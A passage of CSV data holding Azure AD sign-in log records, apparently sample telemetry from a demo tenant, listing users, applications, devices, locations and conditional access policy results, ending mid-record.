+1868,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,15:13.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 04:15,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",7177d659-5709-4c9c-976e-940f58f80200,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,7177d659-5709-4c9c-976e-940f58f80200,SigninLogs,Sucess,33.0175209,35.44601059
+1869,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:55.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5a1883b3-a76d-4215-8892-7d070d943c43,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 04:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",c8ea9bc1-b11e-4423-93a8-17c0a88e0400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,c8ea9bc1-b11e-4423-93a8-17c0a88e0400,SigninLogs,Sucess,36.6404686,-78.26995087
+1870,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,14:28.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 05:14,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",13ab9514-e229-4755-99bf-dc889c720500,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,13ab9514-e229-4755-99bf-dc889c720500,SigninLogs,Sucess,33.0175209,35.44601059
+1871,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,59:26.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4b783129-84d5-440d-8448-fd7b4b68e5c4,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:59,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.471'}",aa9828f4-3e2d-42fa-acbc-edb9fec71000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,aa9828f4-3e2d-42fa-acbc-edb9fec71000,SigninLogs,Sucess,35.01296997,-80.93171692
+1872,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:03.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,536dee7b-d4fc-488e-951f-b0f2892cf20d,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",37105d23-9607-4aeb-a84b-5fa3561f0f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,37105d23-9607-4aeb-a84b-5fa3561f0f00,SigninLogs,Sucess,36.6404686,-78.26995087
+1873,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,13:44.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a1165b22-be1d-4e78-8b8a-73a0d8bbff2b,Microsoft.aadiam,Microsoft.aadiam,,Ashish Kapila,4,GB,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:13,"{'operatingSystem': 'Windows 10', 'deviceId': 'a8835158-f705-4014-a58f-5a04beb76aba', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-15OQVR5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",61a2605b-1788-437f-91b8-6fba4a3a2c00,,,"{'countryOrRegion': 'GB', 'geoCoordinates': {'longitude': -0.9697200059890749, 'latitude': 51.445831298828125}, 'state': 'Reading', 'city': 'Reading'}",none,none,none,none,[],{'errorCode': 0},Ashish Kapila,61c20c19-6e81-4684-affc-fdb7086bb546,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,61a2605b-1788-437f-91b8-6fba4a3a2c00,SigninLogs,Sucess,51.4458313,-0.969720006
+1874,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:57.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,1c853f11-fbd3-4f1b-9b35-dfc12469da90,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",1fc6d415-116e-44c9-a4fc-b8eff70e1000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,1fc6d415-116e-44c9-a4fc-b8eff70e1000,SigninLogs,Sucess,36.6404686,-78.26995087
+1875,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:57.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,54c1469f-4056-0000-54b3-36a62e1965cc,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:08,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",c95450b3-582d-4306-9dd2-9bdade310e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 